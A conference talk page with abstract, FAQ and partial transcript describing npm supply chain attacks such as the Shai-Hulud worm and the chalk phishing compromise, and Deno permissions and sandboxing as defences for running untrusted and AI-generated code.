npm install && pray

This ad is not shown to multipass and full ticket holders
React Summit
React Summit 2026
June 11 - 15, 2026
Amsterdam & Online
The biggest React conference worldwide
Upcoming event
React Summit 2026
React Summit 2026
June 11 - 15, 2026. Amsterdam & Online
Learn more
Bookmark
Rate this content
Sentry
Promoted
Code breaks, fix it faster

Crashes, slowdowns, regressions in prod. Seer by Sentry unifies traces, replays, errors, profiles to find root causes fast.

We all know the ritual: add a dependency, trust it implicitly, ship it to production. For years, that worked well enough. But now the attacks have started getting smarter.

Supply chain attacks targeting the npm ecosystem aren't theoretical anymore. Malicious packages that steal credentials, hijack environment variables or silently exfiltrate data over HTTP are showing up in minor version bumps. The JavaScript ecosystem's greatest strength, its openness, has become its greatest liability.

And then we handed our keyboards to AI.

AI assistants are, of course, useful. But they introduce a new category of risk: code you didn't write, don't fully understand, and may never review fully enough. Models can leak API keys into generated output, AI-written code can accidentally delete files, their code can make unintended network calls, or worse. And if someone's poisoned the training data, your AI might do this on purpose.

In this talk, we'll walk through real examples of threat vectors, demonstrate how Deno's permission system can stop a supply chain attack in its tracks, and explore how sandboxing your code execution can give you a genuinely safe environment to run AI-generated code without the overhead of standing up Docker infrastructure.

You'll leave with a clearer picture of the threat landscape and practical tools to execute code you might not trust.

This talk has been presented at Node Congress 2026, check out the latest edition of this JavaScript Conference.

FAQ

Supply chain attacks in the npm ecosystem occur when malicious actors compromise trusted packages. They exploit implicit trust in version ranges and can attack maintainers via phishing to gain publishing rights, injecting malware into popular packages.

ShaiHuLu'd was a self-replicating worm that compromised over 500 npm packages by stealing credentials and publishing malicious versions of packages. A second wave, ShaiHuLu'd 2.0, compromised 796 more packages, affecting over 20 million weekly downloads.

Deno's permission system requires explicit permissions for accessing sensitive APIs, unlike Node.js, which grants permissions by default. Deno can restrict environment variable access, internet access, and file system operations to enhance security.

Docker provides containerized isolation for running AI-generated code, but requires setup. Deno's permissions offer a simpler alternative by restricting access to sensitive operations. Both methods aim to prevent unauthorized access and data loss.

Deno's sandbox feature uses micro VM-based sandboxes for executing code in complete isolation. This ensures separate file systems, network namespaces, and limits access to sensitive data, protecting against potential security risks from untrusted code.

AI coding assistants can inadvertently suggest insecure coding patterns, expose API keys, and execute unintended actions. They could potentially be manipulated through prompt injection attacks to compromise security.

Developers can use Deno's secrets option, which replaces sensitive information with placeholders. Secrets are only revealed during approved API calls, preventing unauthorized access or exfiltration by untrusted code.

Model poisoning involves injecting malicious data into AI training datasets, potentially backdooring models to behave maliciously under specific conditions. This poses significant security risks as the compromised models can act unpredictably.

AI-generated code should be treated as untrusted because it may contain errors or unintended behaviors. Running it in isolation and reviewing it thoroughly helps prevent potential security vulnerabilities or data loss.

The Chalk attack involved attackers registering a fake domain, npmjs.help, and sending a phishing email to a maintainer to steal credentials. This allowed them to hijack cryptocurrency transactions by injecting code into popular npm packages.

Jo Franchetti
Jo Franchetti
29 min
26 Mar, 2026

Comments

Sign in or register to post your comment.
Video Summary and Transcription
JavaScript developers face security risks in npm packages with self-replicating worms compromising packages. Supply chain attacks target prolific maintainers leading to unauthorized code injections. Vulnerabilities in package maintainers and implicit trust contribute to successful attacks. Secure package installation practices vary between npm and Deno. AI-generated code introduces new security risks with embedded secrets. Secure AI code execution involves sandboxing for isolation and secure handling of API keys.
Available in Español: npm install && pray

1. Security Risks of NPM Packages

Short description:

JavaScript developers trust npm packages for functionality, but a new threat emerged in 2025. A self-replicating worm, shyhoo lewd, compromised over 500 npm packages by stealing credentials and publishing malicious versions. A second wave, shyhoo lewd 2.0, targeted 796 more packages, impacting millions of weekly downloads.

Hello, Node Congress. Thank you so much for having me. I'm Jo Franchetti and I'm a DevRel at Deno, and I'm going to dive right in and let's talk about some scary stuff.

There's a ritual that every JavaScript developer knows. You're building something, you need to pass dates or validate an email or format a currency. So you do what any reasonable person does. You open up your terminal and you type npm install, and you pick a package with a few million weekly downloads and a friendly readme. You trust it. You ship it.

And for a long time, that worked great. And our ecosystem grew because of that trust, because someone could publish a utility at 2 a.m. and by morning developers on the other side of the world were using it already in production. And that openness is genuinely beautiful. It's why JavaScript became what it is. But we need to talk about what that trust costs us now.

In September of 2025, researchers at Reversing Labs identified something that hadn't been seen before in the npm ecosystem. It was a self-replicating worm, and they called it shyhoo lewd after the sandworm from June, which is pretty fitting because once it got into the ecosystem, it was very hard to stop. And here's what it did. It started with a single malicious package. In this case, it was rxnt authentication. And once a developer installed it, the malware would scan their environment for npm credentials. Then it used those credentials to publish a malicious version of other packages that that developer maintained or had access to. It was literally viral.

Each new victim became a new vector for attack. By the time it was contained, over 500 npm packages have been compromised. Then there was a second wave, shyhoo lewd 2.0, which hit in November and compromised 796 more packages. And that represented over 20 million weekly downloads. And what was the malware actually stealing? Well, anything that it could find. It was looking for environment variables, AWS and GCP tokens, GitHub credentials, npm auth tokens. And it did all of this silently over HTTP in the background while your app ran perfectly.

2. Supply Chain Attacks in NPM Ecosystem

Short description:

A supply chain attack in the npm ecosystem targeted a prolific maintainer, compromising 18 packages with over 2 billion weekly downloads. Attackers used a phishing email to obtain credentials, leading to unauthorized updates injecting code for hijacking cryptocurrency transactions. Implicit trust in version ranges and human vulnerabilities contribute to the success of such attacks.

You would never know. And a month earlier, in September 2025, a different attack hit even harder. You've maybe heard of the chalk or debug packages, two of the most downloaded packages in the entire npm ecosystem. And a very prolific maintainer managed both of these along with 16 other widely used packages. Combined, they had more than 2 billion weekly downloads.

What the attackers did is they registered the domain npmjs.help. And then three days after registering it, they sent the maintainer an email from support at npmjs.help. And they were impersonating npm support. The email was convincing enough to get the maintainer to enter their credentials into a fake login page. And with those credentials, the attackers then had full publishing rights to all 18 of their packages.

So let's take a moment to understand the mechanics because that's important for what we're going to talk about next. Supply chain attacks in the npm ecosystem work because of a combination of factors. First are implicit trust in version ranges. We all do it. Most npm files, our package.json files, use a hat or a tilde in front of the version numbers. That means that when a maintainer pushes, say, 2.1.1 to fix a bug, your CI is going to automatically pull it in. There's no review. You don't get any approval. It just lands in production.

Check out more articles and videos

We constantly think of articles and videos that might spark Git people interest / skill us up or help building a stellar career

Building a Voice-Enabled AI Assistant With Javascript
JSNation 2023JSNation 2023
21 min
Building a Voice-Enabled AI Assistant With Javascript
Top Content
This Talk discusses building a voice-activated AI assistant using web APIs and JavaScript. It covers using the Web Speech API for speech recognition and the speech synthesis API for text to speech. The speaker demonstrates how to communicate with the Open AI API and handle the response. The Talk also explores enabling speech recognition and addressing the user. The speaker concludes by mentioning the possibility of creating a product out of the project and using Tauri for native desktop-like experiences.
The Ai-Assisted Developer Workflow: Build Faster and Smarter Today
JSNation US 2024JSNation US 2024
31 min
The Ai-Assisted Developer Workflow: Build Faster and Smarter Today
Top Content
AI is transforming software engineering by using agents to help with coding. Agents can autonomously complete tasks and make decisions based on data. Collaborative AI and automation are opening new possibilities in code generation. Bolt is a powerful tool for troubleshooting, bug fixing, and authentication. Code generation tools like Copilot and Cursor provide support for selecting models and codebase awareness. Cline is a useful extension for website inspection and testing. Guidelines for coding with agents include defining requirements, choosing the right model, and frequent testing. Clear and concise instructions are crucial in AI-generated code. Experienced engineers are still necessary in understanding architecture and problem-solving. Energy consumption insights and sustainability are discussed in the Talk.
The Rise of the AI Engineer
React Summit US 2023React Summit US 2023
30 min
The Rise of the AI Engineer
Top Content
Watch video: The Rise of the AI Engineer
The rise of AI engineers is driven by the demand for AI and the emergence of ML research and engineering organizations. Start-ups are leveraging AI through APIs, resulting in a time-to-market advantage. The future of AI engineering holds promising results, with a focus on AI UX and the role of AI agents. Equity in AI and the central problems of AI engineering require collective efforts to address. The day-to-day life of an AI engineer involves working on products or infrastructure and dealing with specialties and tools specific to the field.
AI and Web Development: Hype or Reality
JSNation 2023JSNation 2023
24 min
AI and Web Development: Hype or Reality
Top Content
This talk explores the use of AI in web development, including tools like GitHub Copilot and Fig for CLI commands. AI can generate boilerplate code, provide context-aware solutions, and generate dummy data. It can also assist with CSS selectors and regexes, and be integrated into applications. AI is used to enhance the podcast experience by transcribing episodes and providing JSON data. The talk also discusses formatting AI output, crafting requests, and analyzing embeddings for similarity.
The AI-Native Software Engineer
JSNation US 2025JSNation US 2025
35 min
The AI-Native Software Engineer
Software engineering is evolving with AI and VIBE coding reshaping work, emphasizing collaboration and embracing AI. The future roadmap includes transitioning from augmented to AI-first and eventually AI-native developer experiences. AI integration in coding practices shapes a collaborative future, with tools evolving for startups and enterprises. AI tools aid in design, coding, and testing, offering varied assistance. Context relevance, spec-driven development, human review, and AI implementation challenges are key focus areas. AI boosts productivity but faces verification challenges, necessitating human oversight. The impact of AI on code reviews, talent development, and problem-solving evolution in coding practices is significant.
Web Apps of the Future With Web AI
JSNation 2024JSNation 2024
32 min
Web Apps of the Future With Web AI
Web AI in JavaScript allows for running machine learning models client-side in a web browser, offering advantages such as privacy, offline capabilities, low latency, and cost savings. Various AI models can be used for tasks like background blur, text toxicity detection, 3D data extraction, face mesh recognition, hand tracking, pose detection, and body segmentation. JavaScript libraries like MediaPipe LLM inference API and Visual Blocks facilitate the use of AI models. Web AI is in its early stages but has the potential to revolutionize web experiences and improve accessibility.

Workshops on related topic

AI on Demand: Serverless AI
DevOps.js Conf 2024DevOps.js Conf 2024
163 min
AI on Demand: Serverless AI
Top Content
Featured WorkshopFree
Nathan Disidore
Nathan Disidore
In this workshop, we discuss the merits of serverless architecture and how it can be applied to the AI space. We'll explore options around building serverless RAG applications for a more lambda-esque approach to AI. Next, we'll get hands on and build a sample CRUD app that allows you to store information and query it using an LLM with Workers AI, Vectorize, D1, and Cloudflare Workers.
AI for React Developers
React Advanced 2024React Advanced 2024
142 min
AI for React Developers
Top Content
Featured Workshop
Eve Porcello
Eve Porcello
Knowledge of AI tooling is critical for future-proofing the careers of React developers, and the Vercel suite of AI tools is an approachable on-ramp. In this course, we’ll take a closer look at the Vercel AI SDK and how this can help React developers build streaming interfaces with JavaScript and Next.js. We’ll also incorporate additional 3rd party APIs to build and deploy a music visualization app.
Topics:- Creating a React Project with Next.js- Choosing a LLM- Customizing Streaming Interfaces- Building Routes- Creating and Generating Components - Using Hooks (useChat, useCompletion, useActions, etc)
Building Full Stack Apps With Cursor
JSNation 2025JSNation 2025
46 min
Building Full Stack Apps With Cursor
Featured Workshop
Mike Mikula
Mike Mikula
In this workshop I’ll cover a repeatable process on how to spin up full stack apps in Cursor.  Expect to understand techniques such as using GPT to create product requirements, database schemas, roadmaps and using those in notes to generate checklists to guide app development.  We will dive further in on how to fix hallucinations/ errors that occur, useful prompts to make your app look and feel modern, approaches to get every layer wired up and more!  By the end expect to be able to run your own AI generated full stack app on your machine!
Please, find the FAQ here
Vibe coding with Cline
JSNation 2025JSNation 2025
64 min
Vibe coding with Cline
Featured Workshop
Nik Pash
Nik Pash
The way we write code is fundamentally changing. Instead of getting stuck in nested loops and implementation details, imagine focusing purely on architecture and creative problem-solving while your AI pair programmer handles the execution. In this hands-on workshop, I'll show you how to leverage Cline (an autonomous coding agent that recently hit 1M VS Code downloads) to dramatically accelerate your development workflow through a practice we call "vibe coding" - where humans focus on high-level thinking and AI handles the implementation.You'll discover:The fundamental principles of "vibe coding" and how it differs from traditional developmentHow to architect solutions at a high level and have AI implement them accuratelyLive demo: Building a production-grade caching system in Go that saved us $500/weekTechniques for using AI to understand complex codebases in minutes instead of hoursBest practices for prompting AI agents to get exactly the code you wantCommon pitfalls to avoid when working with AI coding assistantsStrategies for using AI to accelerate learning and reduce dependency on senior engineersHow to effectively combine human creativity with AI implementation capabilitiesWhether you're a junior developer looking to accelerate your learning or a senior engineer wanting to optimize your workflow, you'll leave this workshop with practical experience in AI-assisted development that you can immediately apply to your projects. Through live coding demos and hands-on exercises, you'll learn how to leverage Cline to write better code faster while focusing on what matters - solving real problems.
The React Developer's Guide to AI Engineering
React Summit US 2025React Summit US 2025
96 min
The React Developer's Guide to AI Engineering
Featured WorkshopFree
Niall Maher
Niall Maher
A comprehensive workshop designed specifically for React developers ready to become AI engineers. Learn how your existing React skills—component thinking, state management, effect handling, and performance optimization—directly translate to building sophisticated AI applications. We'll cover the full stack: AI API integration, streaming responses, error handling, state persistence with Supabase, and deployment with Vercel.Skills Translation:- Component lifecycle → AI conversation lifecycle- State management → AI context and memory management- Effect handling → AI response streaming and side effects- Performance optimization → AI caching and request optimization- Testing patterns → AI interaction testing strategiesWhat you'll build: A complete AI-powered project management tool showcasing enterprise-level AI integration patterns.
Build LLM agents in TypeScript with Mastra and Vercel AI SDK
React Advanced 2025React Advanced 2025
145 min
Build LLM agents in TypeScript with Mastra and Vercel AI SDK
Featured WorkshopFree
Eric Burel
Eric Burel
LLMs are not just fancy search engines: they lay the ground for building autonomous and intelligent pieces of software, aka agents.
Companies are investing massively in generative AI infrastructures. To get their money's worth, they need developers that can make the best out of an LLM, and that could be you.
Discover the TypeScript stack for LLM-based development in this 3 hours workshop. Connect to your favorite model with the Vercel AI SDK and turn lines of code into AI agents with Mastra.ai.